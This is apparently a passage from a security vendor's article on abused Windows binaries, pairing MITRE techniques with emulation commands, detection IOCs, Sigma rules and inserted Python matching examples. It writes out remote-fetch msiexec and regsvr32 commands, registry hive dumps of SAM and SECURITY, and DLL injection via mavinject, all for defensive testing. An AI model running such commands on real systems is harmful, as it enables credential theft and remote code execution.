→ python.exe → powershell.exe → aiq_il_code.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml\r\nJsc.exe\r\nBinary description\r\njsc.exe is a command-line tool that is included with Microsoft’s .NET Framework. It stands for “JavaScript Compiler” and is used to compile JavaScript code into .NET bytecode, which can be executed by the Common Language Runtime (CLR).\r\nThe jsc.exe tool can be used to create standalone applications, Windows services, or console applications that run on the .NET Framework. It can also be used to create code libraries that can be used by other .NET applications.\r\nTTPs and tactics\r\nDefense Evasion: Obfuscated Files or Information: Compile After Delivery (T1027.004)\r\nHow do the adversaries use it?\r\nAn attacker can deliver a source code file containing the malicious code to the target system and then use jsc.exe to compile the code into an executable file. By compiling the code on the target system, the attacker can avoid detection by security software that may have signatures or behavioral patterns for known malicious executables.\r\nThe use of jsc.exe in this context requires that the attacker has already gained access to the target system and has the necessary permissions to execute the compiler.
Once the code is compiled, the attacker can execute it to achieve their malicious goals, such as stealing sensitive data or taking control of the compromised system.\r\nAttackIQ Scenarios\r\nCompile After Delivery using “jsc.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\njsc.exe aiq_js_code.js\r\nThe content of aiq_js_code.js is:\r\nprint('AttackIQ compiled JScript binary has been executed');\r\nAfter compiling the binary, the scenario will execute the compiled file and search for the message “AttackIQ compiled JScript binary has been executed” in the stdout.\r\nThe scenario will be marked as Not Prevented if the message “AttackIQ compiled JScript binary has been executed” is present in the stdout of the compiled binary execution.\r\nExecution\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\jsc.exe' AND process:command_line LIKE '%.js%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → csc.exe → cvtres.exe\r\nThe compiled binary (aiq_js_code.exe), on the other hand, will have the following one:\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → aiq_js_code.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml\r\nMavinject.exe\r\nBinary description\r\nMavinject.exe is a legitimate Windows system file that is part of the Microsoft Application Virtualization (App-V) platform. This file is used to inject or launch virtualized applications in the App-V environment.
The App-V platform allows applications to be virtualized and streamed to client computers without the need for local installation.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Mavinject (T1218.013)\r\nHow do the adversaries use it?\r\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL). Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “mavinject.exe” Script\r\nDescription\r\nThis scenario will execute a binary that will sleep for 15 seconds.\r\nAfter doing that, the scenario will grab its PID and execute the following command:\r\nmavinject.exe $sleep_pid /INJECTRUNNING injectable_dll.dll\r\nThe DLL injectable_dll.dll will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented.
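The Scenario IOCs in this post are SQL-style LIKE expressions over the process image, command line and parent image. The following is an added Python example, not AttackIQ code, that evaluates the forfiles.exe and ftp.exe IOCs above and the mavinject.exe IOC listed under Scenario IOCs below against constructed process-creation events; case-insensitive matching and the event field names are assumptions.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def like(pattern: str, value: str) -> bool:
    """Evaluate a SQL/STIX-style LIKE pattern against a string: '%' matches any
    run of characters, '_' matches exactly one, everything else is literal.
    Matching is case-insensitive here (an assumption; the post does not state
    how its platform compares case)."""
    regex = "".join(
        {"%": ".*", "_": "."}.get(token, re.escape(token))
        for token in re.split(r"([%_])", pattern)
    )
    return re.fullmatch(regex, value, flags=re.IGNORECASE | re.DOTALL) is not None


def forfiles_indirect_exec(ev: Event) -> bool:
    """The forfiles.exe IOC: forfiles.exe invoked with /p, /m and /c (or the
    dash-prefixed forms) on the same command line."""
    cl = ev["cmdline"]
    return (like(r"%\forfiles.exe", ev["image"])
            and (like("% /c %", cl) or like("% -c %", cl))
            and (like("% /m %", cl) or like("% -m %", cl))
            and (like("% /p %", cl) or like("% -p %", cl)))


def ftp_scripted(ev: Event) -> bool:
    """The ftp.exe IOC: ftp.exe driven by a -s: command file, or any process
    whose parent is ftp.exe."""
    return ((like(r"%\ftp.exe", ev["image"]) and like("%-s:%", ev["cmdline"]))
            or like(r"%\ftp.exe", ev["parent"]))


def mavinject_injection(ev: Event) -> bool:
    """The mavinject.exe IOC: /INJECTRUNNING on the command line from any
    parent other than the App-V client (a plain inequality, not a LIKE)."""
    return (ev["parent"].casefold() != r"c:\windows\system32\appvclient.exe"
            and like("% /INJECTRUNNING %", ev["cmdline"]))


IOCS: Dict[str, Callable[[Event], bool]] = {
    "forfiles_indirect_exec": forfiles_indirect_exec,
    "ftp_scripted": ftp_scripted,
    "mavinject_injection": mavinject_injection,
}

# Constructed process-creation events (not real telemetry). Field names are
# assumptions standing in for process:binary_ref.name, process:command_line
# and process:parent_ref.binary_ref.name. Event 1 is a routine log clean-up
# that uses all three switches the forfiles IOC keys on; event 4 is the
# App-V client's own use of /INJECTRUNNING, which the IOC excludes.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\forfiles.exe", "parent": PS,
     "cmdline": r"forfiles /p c:\windows\system32 /m notepad.exe /c C:\Users\Public\AIQ_pid_binary.exe"},
    {"image": r"C:\Windows\System32\forfiles.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'forfiles /p C:\logs /m *.log /d -30 /c "cmd /c del @path"'},
    {"image": r"C:\Windows\System32\ftp.exe", "parent": r"C:\Python3\python.exe",
     "cmdline": r"ftp.exe -s:ftpcommands.txt"},
    {"image": r"C:\Windows\System32\mavinject.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"mavinject.exe 4321 /INJECTRUNNING C:\Users\Public\injectable_dll.dll"},
    {"image": r"C:\Windows\System32\mavinject.exe", "parent": r"C:\Windows\System32\AppVClient.exe",
     "cmdline": r"mavinject.exe 4321 /INJECTRUNNING C:\ProgramData\App-V\some.dll"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\Users\Public\notes.txt"},
]


def match_events(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, IOC name) for every IOC that fires on each event."""
    return [(i, name) for i, ev in enumerate(events)
            for name, check in IOCS.items() if check(ev)]


if __name__ == "__main__":
    for i, name in match_events(EVENTS):
        print(f"event {i}: {name}: {EVENTS[i]['cmdline']}")
```

Event 1 shows the cost of the forfiles IOC: a routine clean-up job carries the same three switches, so the target of /c needs triage rather than the switch combination alone.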
The scenario will be marked as prevented if the file does not exist.\r\nExecution\r\nScenario IOCs\r\n[((process:parent_ref.binary_ref.name != 'C:\\Windows\\System32\\AppVClient.exe') AND process:command_line LIKE '% /INJECTRUNNING %')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → cmd.exe → mavinject.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml\r\nMicrosoft.Workflow.Compiler.exe\r\nBinary description\r\nMicrosoft.Workflow.Compiler.exe is a command-line tool used in Microsoft’s Windows Workflow Foundation (WF) to compile workflow definitions into executable code.\r\nTTPs and tactics\r\nDefense Evasion: Trusted Developer Utilities Proxy Execution (T1127)\r\nHow do the adversaries use it?\r\nAn adversary could also use it to compile and execute C# or VB.NET code contained in a XOML file.\r\nAttackIQ Scenarios\r\nTrusted Developer Utilities Proxy Execution using “Microsoft.Workflow.Compiler.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nMicrosoft.Workflow.Compiler.exe aiq_csharp_code.xml aiq_microsoft_workflow_compiler_results.xml\r\nIf the scenario is successful, the C# code will be executed and print “AttackIQ C# code has been executed” in the stdout.
If that string is present in the stdout, the scenario will be marked as Not Prevented.\r\nExecution\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\Microsoft.Workflow.Compiler.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → Microsoft.Workflow.Compiler.exe → csc.exe → cvtres.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml\r\nMsiexec.exe\r\nBinary description\r\nMsiexec.exe is an executable file that is part of the Microsoft Windows Installer (MSI) application. It is responsible for installing, modifying, and removing software applications on a Windows computer. MSI is a component of the Windows operating system that provides a standardized way of packaging software applications for distribution and installation.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Msiexec (T1218.007)\r\nHow do the adversaries use it?\r\nAdversaries may abuse msiexec.exe to proxy execution of malicious payloads such as local or network-accessible MSI files or DLLs.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “msiexec.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nmsiexec.exe /q /i http://malware.scenarios.attackiq-ntm.com/msi_create_file/aiq_msi.msi\r\nThe MSI file will create a file in the temp directory when opened.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented.
The scenario will be marked as prevented if the file does not exist.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\msiexec.exe') AND (process:command_line LIKE '%/i%' OR process:command_line LIKE '%-i%' OR process:command_line LIKE '%/package%' OR process:command_line LIKE '%-package%' OR process:command_line LIKE '%/a%' OR process:command_line LIKE '%-a%' OR process:command_line LIKE '%/j%' OR process:command_line LIKE '%-j%') AND (process:command_line LIKE '%/q%' OR process:command_line LIKE '%-q%') AND (process:command_line LIKE '%http%' OR process:command_line LIKE '%\\\\\\\\\\%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → msiexec.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml\r\nNetsh.exe\r\nBinary description\r\nNetsh is a command-line utility in Windows operating systems that allows you to configure and troubleshoot network settings.
It provides access to many network configuration options, including network interfaces, protocols, filters, and routing tables.\r\nTTPs and tactics\r\nCredential Access: Network Sniffing (T1040)\r\nDiscovery: Network Sniffing (T1040)\r\nHow do the adversaries use it?\r\nAn adversary with administrative access to a Windows system could use netsh to capture and analyze network traffic.\r\nAttackIQ Scenarios\r\nNetwork Sniffing using “netsh.exe trace” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe scenario will execute netsh trace start capture=yes report=disabled traceFile=C:\\Users\\Public\\aiq_netsh_trace_capture.etl\r\nThe scenario will ping the localhost 10 times to generate some traffic.\r\nThe scenario will stop the capture.\r\nIf the aiq_netsh_trace_capture.etl file exists, the scenario will be marked as not prevented. Else, it will be marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\netsh.exe') AND (process:command_line LIKE '%start%' AND process:command_line LIKE '%trace%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → netsh.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml\r\nOdbcconf.exe\r\nBinary description\r\nodbcconf.exe is a command-line tool that is used to manage ODBC (Open Database Connectivity) data sources on Windows operating systems.
ODBC is a standard software interface for accessing databases, and ODBC data sources are used to define the connection details for accessing a particular database.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Odbcconf (T1218.008)\r\nHow do the adversaries use it?\r\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to Regsvr32, odbcconf.exe has a REGSVR flag that can be misused to execute DLLs.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “odbcconf.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nodbcconf.exe -f odbc.rsp\r\nThe file odbc.rsp contains:\r\nREGSVR odbc.dll\r\nThe DLL odbc.dll will create a file in the temp directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented. The scenario will be marked as prevented if the file does not exist.\r\nScenario IOCs\r\n[(((process:binary_ref.name LIKE '%\\odbcconf.exe') AND (process:command_line LIKE '%-a%' OR process:command_line LIKE '%-f%' OR process:command_line LIKE '%/a%' OR process:command_line LIKE '%/f%' OR process:command_line LIKE '%regsvr%')) OR ((process:binary_ref.name LIKE '%\\rundll32.exe') AND process:parent_ref.binary_ref.name LIKE '%\\odbcconf.exe'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → odbcconf.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml\r\nPcalua.exe\r\nBinary description\r\nPcalua.exe is a legitimate Windows executable file that stands for “Program Compatibility Assistant LUA” or “Program Compatibility Assistant Low User Access”.
It is a component of the Windows operating system and is responsible for detecting compatibility issues with software applications that are installed on your computer.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAn attacker can exploit Pcalua.exe to run their own malicious code by disguising it as the legitimate file.\r\nAttackIQ Scenarios\r\nIndirect Command Execution using “pcalua.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nA binary called AIQ_file_creator.exe will be dropped in the current working directory.\r\nThe command “pcalua.exe -a AIQ_file_creator.exe” will be executed.\r\nIf the execution succeeds, a folder and a file inside the TEMP directory will be created.\r\nIf the file exists, the scenario will be marked as “not prevented.” Else, it will be marked as “prevented.”\r\nExecution\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\pcalua.exe' AND process:command_line LIKE '% -a%')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → pcalua.exe → aiq_file_creator.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml\r\nPcwrun.exe\r\nBinary description\r\npcwrun.exe is a legitimate Windows executable that launches the Program Compatibility Wizard.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution (T1218)\r\nHow do the adversaries use it?\r\nAdversaries may abuse this binary by leveraging the MSDT Follina vulnerability through Pcwrun to execute arbitrary commands and binaries.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “pcwrun.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe downloaded binary is copied into the C:\\Users\\Public folder.\r\nThe command pcwrun.exe /../../\\$(C:\\Users\\Public\\AIQ_file_creator.exe).exe is executed.\r\nIf the binary is successfully executed, a file should be created in the temp folder. If the file exists, the scenario will be marked as not prevented. Else, the scenario will be marked as prevented.\r\nExecution\r\nScenario IOCs\r\n[process:parent_ref.binary_ref.name LIKE '%\\pcwrun.exe']\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → pcwrun.exe → msdt.exe\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → aiq_file_creator.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml\r\nPktmon.exe\r\nBinary description\r\npktmon.exe is a command-line tool included in recent versions of Windows (starting from Windows 10) that allows users to capture network traffic on their system.
It is a lightweight packet monitoring tool that can capture and analyze network traffic for troubleshooting and diagnostic purposes.\r\nTTPs and tactics\r\nCredential Access: Network Sniffing (T1040)\r\nDiscovery: Network Sniffing (T1040)\r\nHow do the adversaries use it?\r\nAn adversary with administrative access to a Windows system could use pktmon.exe to capture and analyze network traffic.\r\nAttackIQ Scenarios\r\nNetwork Sniffing using “pktmon.exe” Script\r\nDescription\r\nIn this scenario, the following actions will take place:\r\nThe scenario will execute pktmon.exe start --etw\r\nThe scenario will ping the localhost 10 times to generate some traffic.\r\nThe scenario will stop the capture.\r\nIf the pktetl.etl file exists, the scenario will be marked as not prevented. Else, it will be marked as prevented.\r\nThis scenario requires admin privileges.\r\nExecution\r\nScenario IOCs\r\n[(process:binary_ref.name LIKE '%\\pktmon.exe')]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → pktmon.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml\r\nPrint.exe\r\nBinary description\r\nprint.exe is a legitimate Windows executable that is used by Windows to send files to the printer.\r\nTTPs and tactics\r\nCommand and Control: Ingress Tool Transfer (T1105)\r\nHow do the adversaries use it?\r\nAdversaries may use print.exe to copy a file into the system.\r\nAttackIQ Scenarios\r\nCopy a file using “print.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nprint.exe /D:$env:temp\\$name helloworld.exe\r\nThe scenario will be marked as Not Prevented if the file is copied into the destination path.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\print.exe' AND process:command_line LIKE '%.exe%' AND process:command_line LIKE '%/D%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → print.exe\r\nSigma Rules\r\nIn order to detect this scenario you will need to remove the filter and the line CommandLine|startswith: 'print' from this Sigma rule:\r\n/rules/windows/process_creation/proc_creation_win_susp_print.yml\r\nReg.exe\r\nBinary description\r\nReg.exe is a command-line tool that is included with Microsoft Windows operating systems. It is used to manage the Windows Registry, which is a hierarchical database that stores configuration settings and other information about the operating system and installed software.\r\nTTPs and tactics\r\nCredential Access: OS Credential Dumping: Security Account Manager (T1003.002)\r\nHow do the adversaries use it?\r\nAdversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored.\r\nAttackIQ Scenarios\r\nDump Registry Hives using “reg.exe” Script\r\nDescription\r\nThis scenario will attempt to dump the SECURITY, SYSTEM, and SAM hives from the registry by running:\r\nreg.exe save HKLM\\SECURITY security.bak\r\nreg.exe save HKLM\\SYSTEM system.bak\r\nreg.exe save HKLM\\SAM sam.bak\r\nThis scenario requires admin privileges.\r\nExecution\r\nScenario IOCs\r\n[((process:binary_ref.name LIKE '%\\reg.exe') AND (process:command_line LIKE '%\\system%' OR process:command_line LIKE '%\\sam%' OR process:command_line LIKE '%\\security%' OR process:command_line LIKE '%\\ˢystem%' OR process:command_line LIKE '%\\syˢtem%' OR process:command_line LIKE '%\\ˢyˢtem%' OR process:command_line LIKE '%\\ˢam%' OR process:command_line LIKE '%\\ˢecurity%') AND (process:command_line LIKE '%hklm%' OR process:command_line LIKE '%hk˪m%' OR process:command_line LIKE '%hkey_local_machine%' OR process:command_line LIKE '%hkey_˪ocal_machine%' OR process:command_line LIKE '%hkey_loca˪_machine%' OR process:command_line LIKE '%hkey_˪oca˪_machine%') AND (process:command_line LIKE '%save%' OR process:command_line LIKE '%export%' OR process:command_line LIKE '%ˢave%' OR process:command_line LIKE '%eˣport%'))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → powershell.exe → reg.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml\r\nRegasm.exe\r\nBinary description\r\nRegasm.exe is a tool provided by Microsoft’s .NET Framework that is used to register .NET assemblies for use in COM interop scenarios.
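The reg.exe IOC above lists the hive names, root keys and verbs spelled with lookalike characters (ˢ, ˪, ˣ) next to their plain ASCII spellings. The following is an added Python example, not AttackIQ code, that folds exactly those three lookalikes back to ASCII before applying the IOC's three conditions, and reports which constructed command lines an ASCII-only version of the check would miss; the events are constructed and the character map covers only what this page's IOC enumerates.

```python
from typing import Dict, List, Optional, Tuple

# Lookalike characters enumerated in the post's reg.exe IOC, mapped back to the
# ASCII letter each stands in for. The map deliberately contains only what the
# IOC lists; any other substitution seen in telemetry has to be added here.
LOOKALIKES = {
    "ˢ": "s",  # U+02E2 MODIFIER LETTER SMALL S
    "˪": "l",  # U+02EA MODIFIER LETTER YIN DEPARTING TONE MARK
    "ˣ": "x",  # U+02E3 MODIFIER LETTER SMALL X
}

# The three conditions of the post's IOC, in their plain ASCII form.
SENSITIVE_HIVES = ("\\sam", "\\system", "\\security")
HKLM_ROOTS = ("hklm", "hkey_local_machine")
DUMP_VERBS = ("save", "export")


def fold_lookalikes(command_line: str) -> str:
    """Lower-case the command line and replace each listed lookalike with its
    ASCII letter, so one ASCII condition covers every spelling the IOC lists."""
    folded = command_line.casefold()
    for glyph, ascii_letter in LOOKALIKES.items():
        folded = folded.replace(glyph, ascii_letter)
    return folded


def classify_hive_dump(image: str, command_line: str, fold: bool) -> Optional[Tuple[str, str]]:
    """Apply the IOC's three conditions to a reg.exe process creation. Returns
    (hive, verb) when all three hold, else None. With fold=False this is the
    ASCII-only check that the lookalike spellings are meant to slip past."""
    if not image.casefold().endswith("\\reg.exe"):
        return None
    text = fold_lookalikes(command_line) if fold else command_line.casefold()
    hive = next((h for h in SENSITIVE_HIVES if h in text), None)
    root = next((r for r in HKLM_ROOTS if r in text), None)
    verb = next((v for v in DUMP_VERBS if v in text), None)
    if hive and root and verb:
        return hive.lstrip("\\"), verb
    return None


# Constructed process-creation events (not real telemetry). Events 1 and 2 use
# the lookalike spellings the IOC anticipates; events 3 and 4 are benign.
EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe save HKLM\SAM sam.bak"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg ˢave hk˪m\ˢam sam.bak"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe eˣport HKEY_˪OCAL_MACHINE\SYSTEM system.reg"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo save HKLM\SAM"},
]


def evasion_gap(events: List[Dict[str, str]]) -> List[int]:
    """Indexes of events that only the folding check flags, i.e. the command
    lines an ASCII-only version of the IOC would let through."""
    missed = []
    for i, ev in enumerate(events):
        plain = classify_hive_dump(ev["image"], ev["cmdline"], fold=False)
        folded = classify_hive_dump(ev["image"], ev["cmdline"], fold=True)
        if folded and not plain:
            missed.append(i)
    return missed


if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        print(i, classify_hive_dump(ev["image"], ev["cmdline"], fold=True), ev["cmdline"])
    print("missed by the ASCII-only check:", evasion_gap(EVENTS))
```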
COM (Component Object Model) is a technology used to enable communication between software components on Windows-based systems.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Regsvcs/Regasm (T1218.009)\r\nHow do the adversaries use it?\r\nregasm.exe may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively.\r\nAttackIQ Scenarios\r\nSystem Binary Proxy Execution using “regasm.exe” Script\r\nDescription\r\nThis scenario will register a custom DLL by executing:\r\nregasm.exe %temp%\\attackiq_regasm\\library.dll\r\nThe DLL will create a file in the temporary directory when loaded. The scenario will be marked as Not Prevented if the file exists.\r\nThis scenario requires admin privileges.\r\nExecution\r\nScenario IOCs\r\n[(((((process:command_line NOT LIKE '%\\Regasm.exe\"' AND process:command_line NOT LIKE '%\\Regasm.exe' AND process:command_line NOT LIKE '%\\Regsvcs.exe\"' AND process:command_line NOT LIKE '%\\Regsvcs.exe')) AND (process:command_line NOT LIKE '%.dll%')) AND ((process:binary_ref.name LIKE '%\\Regsvcs.exe' OR process:binary_ref.name LIK E '%\\Regasm.exe'))) OR (((process:binary_ref.name LIKE '%\\Regsvcs.exe' OR process:binary_ref.name LIKE '%\\Regasm.exe')) AND (process:command_line LIKE '%\\Users\\Public\\\\%' OR process:command_line LIKE '%\\AppData\\Local\\Temp\\\\%' OR process:command_line LIKE '%\\Desktop\\\\%' OR process:command_line LIKE '%\\Downloads\\\\%' OR process:command_line LIKE '%\\PerfLogs\\\\%' OR process:command_line LIKE '%\\Windows\\Temp\\\\%' OR process:command_line LIKE '%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\\%')))]\r\nBinary process tree\r\nai_exec_server.exe → AiRunCommandAsUser.exe (if running under user privileges) → python.exe → cmd.exe → regasm.exe\r\nSigma Rules\r\n/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml\r\nRegSvr32.exe\r\nBinary description\r\nRegsvr32 is a Windows command-line utility that is used to register and unregister Dynamic Link Libraries (DLLs) and ActiveX Controls in the Windows Registry.\r\nTTPs and tactics\r\nDefense Evasion: System Binary Proxy Execution: Regsvr32 (T1218.010)\r\nHow do the adversaries use it?\r\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to a file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of the technique is often referred to as a “Squiblydoo” and has been used in campaigns targeting governments.\r\nAttackIQ Scenarios\r\nApplication Bypass using “regsvr32.exe” Script\r\nDescription\r\nThis scenario will execute the following command:\r\nregsvr32.exe /s /n /u /i:https://malware.scenarios.attackiq-ntm.com/regsvr32/regsvr32.xml scrobj.dll\r\nregsvr32.xml is an XML file that contains JScript code that will execute a custom binary.\r\nThis binary will create a file in the TEMP directory.\r\nThe scenario will verify if the file exists and mark the scenario as not prevented.
If the file does not exist, the scenario will be marked as prevented.\r\nThis variation of the T1218.010 technique is often referred to as a “Squiblydoo” and has been used in campaigns targeting governments.\r\nExecution\r\nExecute DLL Through RegSvr32\r\nDescription\r\nProcess blacklisting is one of the most effective techniques to mitigate many threats. Therefore, being able to subvert such a defensive strategy is key for any attacker. The regsvr32 technique is used to bypass these types of defenses.\r\nThe regsvr32 Windows utility is used to register COM (Component Object Model) DLLs. This utility receives the DLL that will be registered. Upon regsvr32 execution, the exported DllRegisterServer function from the DLL will be automatically executed.\r\nThrough the execution of this legitimate regsvr32 Windows utility, an attacker can execute arbitrary code while bypassing most binary whitelisting and blacklisting strategies.\r\nThis scenario will execute the regsvr32 utility in order to execute the DLL that will be registered.
Through regsvr32, this DLL\r\nwill execute its DllRegisterServer function that will create a random file in the Windows temporary directory.\r\nExecution\r\n(Click for Larger)\r\nScenario IOCs\r\n[((((process:binary_ref.name LIKE '%\\cscript.exe' OR process:binary_ref.name LIKE '%\\wscript.exe') AND\r\nprocess:parent_ref.binary_ref.name LIKE '%\\regsvr32.exe') OR ((process:command_line LIKE '%.jpg' OR\r\nprocess:command_line LIKE '%.jpeg' OR process:command_line LIKE '%.png' OR process:command_line LIKE '%.gif' OR\r\nprocess:command_line LIKE '%.bin' OR process:command_line LIKE '%.tmp' OR process:command_line LIKE '%.temp' OR\r\nprocess:command_line LIKE '%.txt') AND process:binary_ref.name LIKE '%\\regsvr32.exe') OR ((process:command_line\r\nLIKE '%\\AppData\\Local%' OR process:command_line LIKE '%C:\\Users\\Public%') AND process:binary_ref.name LIKE\r\n'%\\regsvr32.exe') OR ((process:parent_ref.binary_ref.name LIKE '%\\powershell.exe' OR\r\nprocess:parent_ref.binary_ref.name LIKE '%\\pwsh.exe' OR process:parent_ref.binary_ref.name LIKE\r\n'%\\powershell_ise.exe') AND process:binary_ref.name LIKE '%\\regsvr32.exe') OR (process:binary_ref.name LIKE\r\n'%\\EXCEL.EXE' AND process:command_line LIKE '%..\\..\\..\\Windows\\System32\\regsvr32.exe %') OR\r\n(process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:command_line LIKE '%/i:%' AND process:command_line\r\nLIKE '%ftp%' AND process:command_line LIKE '%scrobj.dll') OR (process:binary_ref.name LIKE '%\\regsvr32.exe' AND\r\nprocess:command_line LIKE '%/i:%' AND process:command_line LIKE '%http%' AND process:command_line LIKE\r\n'%scrobj.dll') OR (process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:command_line LIKE '%\\Temp\\\\%') OR\r\n(process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:parent_ref.binary_ref.name LIKE '%\\cmd.exe') OR\r\n(process:binary_ref.name LIKE '%\\regsvr32.exe' AND process:parent_ref.binary_ref.name LIKE '%\\mshta.exe')) AND\r\n(((process:command_line NOT LIKE 
